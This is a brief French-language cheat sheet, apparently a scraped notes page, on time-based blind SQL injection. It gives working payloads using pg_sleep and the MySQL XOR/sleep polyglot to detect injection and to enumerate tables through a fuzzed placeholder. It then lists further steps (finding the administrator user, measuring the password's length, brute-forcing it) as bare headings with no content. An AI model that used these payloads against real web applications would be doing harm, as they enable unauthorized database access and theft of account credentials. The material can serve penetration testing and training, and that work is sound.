⏳Time based
Synthaxe
Exemple d'exploitation sur PostgreSQL
Détection
'||pg_sleep(3)||'
'XOR(if(now()=sysdate(),sleep(10),0))OR'
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/Enumeration des tables
'||(SELECT pg_sleep(3) FROM <FUZZ> LIMIT 1)||'
délais de 3 sec pour table usersEnumeration des colonnes
Recherche utilisateur administrator


Déterminer le nombre de caractères dans le mot de passe
Bruteforce du mot de passe

Mis à jour